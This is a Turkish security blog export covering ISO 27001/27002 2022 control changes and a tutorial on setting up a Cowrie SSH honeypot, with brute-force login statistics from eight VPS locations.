<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.11 Veri maskeleme<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.12 Veri sızıntısını önleme<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.16 İzleme faaliyetleri<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.23 Web filtreleme<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 108.0pt; mso-add-space: auto; mso-list: l0 level1 lfo3; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">A.8.28 Güvenli kodlama<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Yeni
eklenen niteliklerle birlikte kontrol örneği aşağıda verilmiştir. <o:p></o:p></span></p>
<p class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>5.1 Bilgi güvenliği için
politikalar<o:p></o:p></span></b></p>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody><tr style="mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td style="border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.6pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><b style="mso-bidi-font-weight: normal;"><span lang="TR">Kontrol türü<o:p></o:p></span></b></p>
</td>
<td style="border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.6pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><b style="mso-bidi-font-weight: normal;"><span lang="TR">Bilgi güvenliği
özellikleri<o:p></o:p></span></b></p>
</td>
<td style="border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.6pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><b style="mso-bidi-font-weight: normal;"><span lang="TR">Siber güvenlik
kavramları<o:p></o:p></span></b></p>
</td>
<td style="border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.65pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><b style="mso-bidi-font-weight: normal;"><span lang="TR">Operasyonel
kabiliyetler<o:p></o:p></span></b></p>
</td>
<td style="border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.65pt;" valign="top" width="175">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><b style="mso-bidi-font-weight: normal;"><span lang="TR">Güvenlik
alanları<o:p></o:p></span></b></p>
</td>
</tr>
<tr style="height: 25.15pt; mso-yfti-irow: 1; mso-yfti-lastrow: yes;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: 25.15pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.6pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><span lang="TR">#Önleyici<o:p></o:p></span></p>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 25.15pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.6pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><span lang="TR">#Gizlilik #Bütünlük #Erişilebilirlik<o:p></o:p></span></p>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 25.15pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.6pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><span lang="TR">#Tanımlama<o:p></o:p></span></p>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 25.15pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.65pt;" valign="top" width="121">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><span lang="TR">#Yönetişim<o:p></o:p></span></p>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 25.15pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 90.65pt;" valign="top" width="175">
<p class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm;"><span lang="TR">#Yönetişim_ve_Ekosistem #Dayanıklılık<o:p></o:p></span></p>
</td>
</tr>
</tbody></table>
<p class="MsoNormal"><span lang="TR"><o:p> </o:p></span></p>
<p class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Kontrol<o:p></o:p></span></b></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Bilgi
güvenliği politikası ve konuya özel politikalar tanımlanmalı, yönetim
tarafından <span style="mso-tab-count: 1;"> </span>onaylanmalı,
yayınlanmalı, ilgili personel ve ilişkili ilgili taraflara bildirilmeli ve
tanınmalı, <span style="mso-tab-count: 1;"> </span>planlı aralıklarla
ve önemli değişiklikler meydana gelirse gözden geçirilmelidir.<o:p></o:p></span></p>
<p class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Amaç<o:p></o:p></span></b></p>
<p class="MsoNormal"><span lang="TR"><span style="mso-tab-count: 1;"> </span>Bilgi
güvenliği için yönetimin yönlendirmesi ve desteğinin, ticari, yasal,
düzenleyici ve <span style="mso-tab-count: 1;"> </span>sözleşmeye dayalı
gereksinimlere göre sürekli uygunluğunu, yeterliliğini, etkinliğini sağlamak.<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="TR">Bilgi Güvenliği Yönetim Sistemi
işletiyorsanız, versiyon geçişi için aşağıdakileri yapmanız tavsiye edilir:<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">1.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Risk işleme planı yeni yapıya ve
kontrollere göre gözden geçirilmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">2.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Uygulanabilirlik Bildirgesi (SoA)
gözden geçirilmeli ve güncellenmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">3.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Bilgi Güvenliği Yönetim Sistemi
yönetimin gözden geçirme prosedürü (girdiler için) gözden geçirilmeli ve
güncellenmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">4.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Bilgi güvenliği hedefleri ve
izleme, ölçme, analiz ve değerlendirme prosedürü gözden geçirilmeli ve
güncellenmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">5.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Bilgi Güvenliği Yönetim Sistemi
iletişim planı gözden geçirilmeli ve güncellenmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">6.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Gerekliyse, diğer politikalar,
standartlar ve prosedürler gözden geçirilmeli ve güncellenmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">7.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Dahili ve harici olmak üzere,
denetimler için kullanılan kontrol listeleri ve anketler gözden geçirilmeli ve
güncellenmelidir.<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="mso-list: l2 level1 lfo5; text-indent: -18.0pt;"><!--[if !supportLists]--><span lang="TR" style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">8.<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="TR">Kullandığınız kayıtların yeni
gereksinimlere uyumluluğunu göstermek için, üçüncü taraf güvenlik araçları (örneğin
GRC, SIEM, VM) değerlendirilmelidir ve imkan dahilinde uyarlanmalıdır.<o:p></o:p></span></p>Ali Dinçkanhttp://www.blogger.com/profile/02006595633964771318noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-86587468386651372332022-02-16T21:19:00.002+03:002022-02-16T21:28:48.860+03:00ISO 27001 ve ISO 27002 Standartlarının 2022 Sürümü Değişiklikleri<p align="center" class="MsoNormal" style="text-align: center;"><b>(Özet Bilgiler)</b></p>
<p class="MsoNormal">ISO 27001 ve ISO 27002 standartları BGYS (Bilgi Güvenliği
Yönetim Sistemi) konusunda en temel başvuru kaynaklarıdır. Bu iki standart da
doğrudan bilgi güvenliği konusunu ele alırlar. Teknik ve teknoloji bağımlı
standartlar değildirler. Kurumlar uygulayacağı yöntem ve teknolojileri seçmekte
serbesttirler.<o:p></o:p></p>
<p class="MsoNormal">ISO 27001 standardı BGYS’nin kurulumu, gerçeklenmesi,
işletilmesi, izlenmesi, gözden geçirilmesi, sürdürülmesi ve iyileştirilmesi
için gereksinimleri ortaya koyar. Belgelenebilir bir standart olması nedeni bilgi
güvenliği alanında en yaygın bilinen standarttır. ISO 27001 standardının EK-A
kısmında bilgi güvenliği kontrolleri yer almaktadır. ISO 27002’de ise ISO 27001
EK-A kısmında yer alan bilgi güvenliği kontrollerinin iyi uygulama pratikleri
yer almaktadır. <o:p></o:p></p>
<p class="MsoNormal">Uzun bir süredir güncellenmeyen bu iki standart 2022 yılı
içinde güncellenecektir. İlk güncelleme 15 Şubat 2022 tarihinde ISO 27002
standardında gerçekleşmiştir. <o:p></o:p></p>
<p class="MsoNormal">Temelde neler değişmiştir? Değişecektir?<o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->ISO 27001 standardı Annex SL uyumlu olarak yayınlanacağı
bildirilmiştir. Madde 4 ila 10 arası zorunlu maddeler varlığını koruyacaktır.<o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->ISO 27002 de bulunan kontrol grubu sayısı ve
kontrol sayısı değişmiştir. Kontrol grubu sayısı 14’ten 4’e düşmüştür. Kontrol
sayısı ise 114’ten 93’e inmiştir. <o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->Toplamda 11 yeni kontrol getirilmiştir.
Kaldırılan herhangi bir kontrol yoktur. Birçok kontrol birleştirilerek kontrol
sayısı düşürülmüştür. <o:p></o:p></p>
<p class="MsoNormal">ISO 27002 2022 sürümünde bilgi güvenliği kontrolleri
aşağıdaki şekilde gruplandırılmıştır.<o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->Organizasyonel kontroller (Organizational
controls)<o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->Personel/insan ile ilgili<span style="mso-spacerun: yes;"> </span>kontroller (People controls)<o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->Fiziksel kontroller (Physical controls)<o:p></o:p></p>
<p class="MsoNormal" style="margin-left: 36pt; mso-list: l0 level1 lfo1; text-indent: -18pt;"><!--[if !supportLists]--><span style="mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7pt "Times New Roman";">
</span></span></span><!--[endif]-->Teknolojik kontroller (Technological controls)<o:p></o:p></p>
<p class="MsoNormal">Bulut servislerinin kullanımı için bilgi güvenliği, Bilgi
güvenliği olaylarının (Event) değerlendirilmesi ve karar verilmesi, kesinti
sırasında bilgi güvenliği, veri sızıntısı önleme, veri maskeleme, web
filtreleme gibi ek kontroller getirilmiştir. <o:p></o:p></p><p class="MsoNormal">ISO 27001:2022 sürümünün yıl içinde ne zaman yayınlanacağı
henüz açıklanmamıştır. Ancak ana süreçlerde değişiklik beklenmediği için
temelde aşağıdaki çalışmalar ile uyumluluğun sağlanacağı değerlendirilmektedir. <o:p></o:p></p><p class="MsoNormal" style="margin-left: 36.0pt; mso-list: l0 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]-->-<span style="font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->Değişen kontrol isimleri, sayısı ve grupları
nedeni ile ilgili kontrol dokümantasyonunda güncellemeler.<o:p></o:p></p><p class="MsoNormal" style="margin-left: 36.0pt; mso-list: l0 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]-->-<span style="font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->Yeni kontroller nedeni ile teknik bazı
işleyişlerin yeni yapıya adaptasyonu.<o:p></o:p></p><p class="MsoNormal" style="margin-left: 36.0pt; mso-list: l0 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]-->-<span style="font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->Uygulanabilirlik bildirgesinin yeni yapıya göre
yenilenmesi<o:p></o:p></p><p class="MsoNormal">
</p><p class="MsoNormal" style="margin-left: 36.0pt; mso-list: l0 level1 lfo1; text-indent: -18.0pt;"><!--[if !supportLists]-->-<span style="font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->Risk değerlendirmelerinin yenilenmesi ve bu
sayede yeni kontrol yapısına göre risk eşleştirmeleri.<o:p></o:p></p><p class="MsoNormal"><br /></p>Ali Dinçkanhttp://www.blogger.com/profile/02006595633964771318noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-19745330987003069492021-04-12T16:40:00.002+03:002021-04-12T16:58:44.929+03:00Cowrie Honeypot Kullanarak SSH Sunucularına Gelen Saldırı Trendi Analizi<style>
table, td, th {
border: 1px solid #ddd;
text-align: left;
}
table {
border-collapse: collapse;
width: 100%;
}
th, td {
padding: 15px;
}
</style>
<div style="text-align: justify;">Günümüzde otomatikleştirilmiş araçlar ile birlikte internete açık (public) sunuculara yapılan parola deneme saldırıları çok fazla artmıştır. Bu yazıda saldırganların el ile (manuel) ve otomatik araçlar ile yaptığı saldırılarda denedikleri kullanıcı adı, parola ve saldırının hangi ülkeden geldiği gibi bilgileri cowrie honeypot kurarak analiz ettik.</div><div><br /></div><div><div style="text-align: justify;">Analiz işlemini gerçekleştirirken DigitalOcean üzerinden kiraladığım 8 farklı lokasyondaki (New York, Amsterdam, San Francisco, Singapur, Londra, Frankfurt, Toronto, Bangalore) virtual private server (VPS)'lerin üzerine honeypot kurma işlemini gerçekleştirdik. DigitalOcean üzerindeki sunucuları 2 gün boyunca açık bıraktık ve gelen verileri analiz ederek otomatize araçların ve saldırganların davranışlarını inceledik.</div><div><br /></div><div style="text-align: justify;">Bu yazıda öncelikle honeypot Nedir? Nasıl Çalışır? ve cowrie honeypot nasıl kurulur? bunu anlatacağım. Daha sonra kurduğum canlı sistem üzerinde analiz ettiğim verileri paylaşarak saldırgan hareketlerine değineceğim. </div></div><div><br /></div><div><b>Honeypot Nedir ?</b></div><span><a name='more'></a></span><div><br /></div><div style="text-align: justify;">Honeypot (Bal Küpü) sistemlere yetkisiz erişim sağlamaya çalışan saldırganlar için bilerek açık bırakılmış, saldırganlar hakkında davranışsal bilgi toplamaya yarayan uygulamalardır. Cowrie honeypot ise SSH ve Telnet uygulamaları için hazırlanan bir simülasyondur. Düzgün bir şekilde kulumu yapıldığında SSH ve Telnet portları açıkmış gibi davranır.Saldırganlar bu portlar üzerinde giriş denemesi yaptığı zaman başarılı giriş yapmış gibi sahte bir SSH yada Telnet bağlantısı sağlar. Daha sonra sunucuya bağlandığını sanan saldırganın burada yaptığı tüm işlemleri kaydeder.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-mKxPFaL84hU/YHQuIKxCt8I/AAAAAAAAAII/3vBJkisBhD81eGN6rElgOufGECpRetOIACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="229" data-original-width="468" height="313" src="https://lh3.googleusercontent.com/-mKxPFaL84hU/YHQuIKxCt8I/AAAAAAAAAII/3vBJkisBhD81eGN6rElgOufGECpRetOIACLcBGAsYHQ/w640-h313/image.png" width="640" /></a></div><br /><b>Cowrie Honeypot Kurulumu</b></div><div><span><!--more--></span><div style="text-align: justify;"><span style="font-weight: 700;"><br /></span></div></div><div style="text-align: justify;">Cowrie honeypot açık kaynak olarak <a href="https://github.com/cowrie/cowrie">Github</a> üzerinde paylaşılmaktadır. Cowrie honeypot hem FTP hem de SSH üzerinde çalışabilir fakat bu yazıda yalnızca SSH üzerinde Cowrie honeypotu etkinleştireceğiz. Github üzerinde bulunan kendi kurulum dokümanı üzerinden kurulumu gerçekleştireceğiz.</div><div><br /></div><div style="text-align: justify;">Kuruluma geçmeden önce varsayılan olarak 22 portunda çalışan SSH sunucusunun portunu değiştirerek başka bir porta aktaralım. Bu sayede 22 portuna gelen trafiği honeypot portu(2222) üzerine yönlendirirken gerçek SSH portu ile bir çakışma yaşamayız.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Bunun için <b>nano /etc/ssh/sshd_config</b> komutu ile SSH ayar (config) dosyasını açalım ve port 22 yazan kısmın başındaki # işaretini kaldırdıktan sonra port 4545 yazarak SSH portumuzu değiştirelim. Daha sonra;</div><div><br /></div><div><div><b>$ systemctl restart ssh</b></div><div><br /></div><div><b>$ systemctl status ssh</b></div></div><div><b><br /></b></div><div><div style="text-align: justify;">Komutlarını çalıştırarak SSH servisini yeniden başlatalım. SSH durumunu görüntüleyerek portun değişip değişmediğini kontrol edelim. SSH portunuzu değiştirdikten sonra SSH sunucusunu yeniden başlatma işlemi gerçekleştirmezseniz sunucuya SSH bağlantısı sağlayamazsınız. Böyle bir durumda makineyi kapat aç yapmanız SSH portunun değişmesi için yeterli olacaktır.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Daha sonra aşağıdaki komut ile sunucu için gerekli bağımlılıkları yükleyelim;</div><div><br /></div><div><b>$ sudo apt-get install git python-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind virtualenv</b></div><div><b><br /></b></div><div>Yükleme işlemi tamamlandıktan sonra cowrie isimli bir kullanıcı oluşturalım.</div><div><br /></div><div><b>$ sudo adduser --disabled-password cowrie</b></div><div><b><br /></b></div><div style="text-align: justify;">Kullanıcıyı oluştururken dokümanın önerisi ile parola ile erişimi olmayan bir kullanıcı oluşturduk. Ardından kullanıcının dizinine giderek git ile dosyaları indiriyoruz.</div><div><br /></div><div><b>$ git clone http://github.com/cowrie/cowrie</b></div><div><b><br /></b></div><div>Ardından dizine giderek bu dizinde bir sanal ortam oluşturma işlemi gerçekleştiriyoruz.</div><div><br /></div><div><b>$ virtualenv --python=python3 cowrie-env</b></div><div><b><br /></b></div><div style="text-align: justify;">Şimdi honeypot için gerekli bağımlılıkları yüklememiz gerekmektedir. Bunun için oluşturduğumuz sanal ortama geçiş yapıyoruz ve bağımlılıkları pip ile indiriyoruz.</div><div><br /></div><div><b>$ source cowrie-env/bin/activate</b></div><div><b><br /></b></div><div><div><b>$ (cowrie-env) $ pip install --upgrade pip</b></div><div><b>$ (cowrie-env) $ pip install --upgrade -r requirements.txt</b></div></div><div><b><br /></b></div><div style="text-align: justify;">Tüm kurulum işlemleri tamamlandıktan sonra cowrie 2222 portunda çalışmaya başlayacaktır. Şimdi 22 portuna gelen trafiği 2222 portuna yönlendirme işlemini gerçekleştireceğiz. Bu sayede varsayılan olarak gelen SSH portuna yapılan istekler honeypotun oluşturduğu sahte SSH sunucusuna yönlendirilecektir.</div><div><b><br /></b></div><div><b>$ sudo iptables -t nat -A PREROUTING -p tcp –dport 22 -j REDIRECT –to-port 2222</b></div><div><b><br /></b></div><div>Yukarıdaki komut ile 22 portuna gelen istekleri 2222 portuna gönderme işlemini tamamladık. Aşağıdaki komutu kullanarak honeypotu çalıştırma işlemini gerçekleştirebiliriz.</div><div><br /></div><div><b>$ bin/cowrie start</b></div><div><br /></div><div><b>Cowrie Honeypot Log Dosyasının İncelenmesi</b></div><div><span><!--more--></span><b><br /></b></div><div><div style="text-align: justify;">Cowrie Honeypot kendine gelen tüm bağlantı isteklerini ve bağlantıdan sonraki hareketleri var/log/cowrie dizini altında tutmaktadır. Log dosyasının daha okunaklı olması için bash script ve python programla dili ile log dosyası çıktılarını biraz daha düzenleme işlemi gerçekleştirildik. Bu çıktılar üzerinden IP adresi, denenen kullanıcı adı parolalar, saldırganların SSH ile sisteme bağlandıklarında ilk çalıştırdıkları komutlar ve saldırıların saat aralıkları gibi verileri elde etmiş olduk.</div><div><br /></div><div style="text-align: justify;">Ayrıca gelen saldırıların daha çok hangi ülke ve hangi kıtadan geldiğini tespit etmek içinde bir API aracılığıyla IP adresi üzerinden coğrafi lokasyon tespiti gerçekleştirmiş olduk. Saldırılar çoğunlukla botlar ile kiralanmış sunucular üzerinden yapıldığı için ip adresi üzerinden tespit edilen coğrafi lokasyonlar saldırı yapan ülkeleri tam olarak ayırt etmemizi sağlamayabilir. Ancak botların en fazla hangi ülke sunucularından kiralandığı gibi bilgiler de bu sayede analiz edilebilir.</div></div><div><br /></div><div><b>Elde Edilen Verilerin Analizi</b></div><span><!--more--></span><div><br /></div><div style="text-align: justify;">Verilerin analiz edilme işlemi gerçekleştirilirken denenen kullanıcı adları, parola, komutlar ve coğrafi lokasyonlar göz önüne alınmıştır. Coğrafi lokasyonları bulmak için IP-API’nin sağladığı <a href="https://ip-api.com/">API</a> aracılığıyla coğrafi lokasyon tespiti gerçekleştirilmiştir. Yapılan isteklerin hızı göz önüne alındığında saldırıların çok büyük bir kısmını otomatize araçların gerçekleştirildiği görülmüştür. Bu yazıda her sunucuya yapılan giriş (login) isteğini ayrı ayrı paylaşmasam da sunucuların bulunduğu lokasyona göre denenen kullanıcı adları ve parolalar farklılık göstermektedir. Özellikle Singapur sunucusunda root/admin kombinasyonunun diğer sunuculara oranla çok daha fazla denendiği tespit edilmiştir.</div><div><br /></div><div><b>Yapılan Giriş İstekleri</b></div><div><span><!--more--></span><b><br /></b></div><div><b><br /></b></div><table>
<thead>
<tr>
<th></th>
<th>Toplam Giriş Denemesi</th>
<th>Başarılı Denemeler</th>
<th>Başarısız Denemeler</th>
</tr>
</thead>
<tbody>
<tr>
<td>Amsterdam</td>
<td>33268</td>
<td>29644</td>
<td>3624</td>
</tr>
<tr>
<td>Bangladore</td>
<td>31580</td>
<td>26012</td>
<td>5568</td>
</tr>
<tr>
<td>San Francisco</td>
<td>16980</td>
<td>7298</td>
<td>9682</td>
</tr>
<tr>
<td>Frankfurt</td>
<td>44596</td>
<td>35713</td>
<td>8883</td>
</tr>
<tr>
<td>London</td>
<td>18161</td>
<td>12816</td>
<td>5345</td>
</tr>
<tr>
<td>Newyork</td>
<td>14933</td>
<td>6590</td>
<td>8343</td>
</tr>
<tr>
<td>Singapore</td>
<td>32286</td>
<td>30803</td>
<td>1483</td>
</tr>
<tr>
<td>Toronto</td>
<td>37781</td>
<td>31463</td>
<td>6318</td>
</tr>
